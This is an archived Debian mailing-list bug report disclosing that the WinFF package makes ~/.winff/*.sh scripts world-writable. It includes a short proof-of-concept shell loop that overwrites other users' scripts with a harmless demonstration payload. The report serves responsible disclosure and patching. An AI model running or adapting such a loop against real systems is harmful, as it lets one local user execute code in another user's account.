[Pkg-pascal-devel] Bug#1061586: ~/.winff/*.sh are world-writable
Jakub Wilk
jwilk at jwilk.net
Fri Jan 26 22:36:02 GMT 2024
Package: winff
Version: 1.5.5-9
Tags: security patch
As it was noted in <https://github.com/WinFF/winff/issues/242>, WinFF
changes permissions of ~/.winff/*.sh files to 0777, which is
world-writable!
Assuming default permissions of the home directory and the .winff
subdir, this can be exploited by local users to execute arbitrary code
with the context of the user running WinFF.
I've attached a proof-of-concept exploit. (It's not 100% reliable.)
I've also attached an untested patch.
--
Jakub Wilk
-------------- next part --------------
#!/bin/sh
while true
do
for file in /home/*/.winff/*.sh
do
echo 'cowsay pwned >&2; sleep inf' | tee "$file" > /dev/null
done
done
-------------- next part --------------
A non-text attachment was scrubbed...
Name: winff-chmod.diff
Type: text/x-diff
Size: 650 bytes
Desc: not available
URL: <http://alioth-lists.debian.net/pipermail/pkg-pascal-devel/attachments/20240126/c4b86427/attachment.diff>
More information about the Pkg-pascal-devel
mailing list